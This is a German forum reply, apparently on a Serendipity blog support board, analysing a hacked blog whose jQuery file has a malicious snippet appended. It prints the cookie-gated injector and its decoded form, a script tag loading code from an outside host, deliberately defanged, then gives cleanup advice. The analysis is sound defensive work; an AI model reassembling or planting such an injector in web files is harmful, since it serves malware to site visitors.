Ja, du hast tatsächlich ein jquery, an dessen Ende ein
Code: Select all
if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();d-o-c-u-m-e-n-t.w-r-i-t-e(unescape('GEWURSCHTEL'));}
angehängt ist. Decodiert man das Gewurschtel
Code: Select all
'p3Cp73p63p72p69p70p74p20p74p79p70p65p3Dp22p74p65p78p74p2Fp6Ap61p76p61p73p63p72p69p70p74p22p20p73p72p63p3Dp22p68p74p74p70p3Ap2Fp2Fp64p6Fp63p74p6Fp72p6Dp65p64p69p63p61p6Cp2Ep69p6Ep2Fp64p6Fp63p74p6Fp72p2Ep70p68p70p22p3Ep3Cp2Fp73p63p72p69p70p74p3E'
in der unescape Klammer, kommt dabei
Code: Select all
<script type="text/javascript" src="http:// doctormedical. in / doctor . php"></script>
heraus.
(Edit: ohne "-" im d.write Aufruf und "p" statt "%" im encodetem, sowie Leerzeichem im decodetem Script. Wurde eingeführt, um wildgewordene Virenwächter zu beruhigen.)
Du kannst natürlich die Jquery version mit einer originalen Version überschreiben. Allerdings könnte es sehr gut sein, dass du weitere veränderte Dateien hast. Es kommt ein wenig darauf an, wie die Infektion stattgefunden hat (über S9y oder FTP oder Hoster Nachlässigkeiten).
Ich würde alle schreibbaren Verzeichnisse und Dateien genauer untersuchen. Angefangen mit der "Installation prüfen" Anwendung im Backend. Dann gibt es hier im Forum durchaus ein paar Threads zum Thema "hacked". Allerdings gab es nur ein Mal eine wirklich offene Verwundbarkeit eines ThirdParty Programmes (JS XINHA Editor) die auf mehreren Blogs tatsächlich auch ausgenutzt wurde. Das wurde m. W. vor langer Zeit mit S9y 1.5.5 gefixt.
Wie gesagt ist ein Rat in diesem Fall nicht ganz so einfach.
Auf alle Fälle würde aber ein Drüberbügeln einer kompletten Version schon einmal die größten Unsicherheiten beseitigen. Dann müsste man auch solche Fälle wie insbesondere das beschreibbare /uploads Directory und dein Theme genauer auf geänderte, bzw hinzugefügte Dateien hin untersuchen.
Vielleicht erst einmal soweit.
Viel Glück
PS. Dein Blog- und Webcleanup ist natürlich nur das eine.... Du solltest auch untersuchen, ob nicht schon dein aufrufender PC infiziert wurde.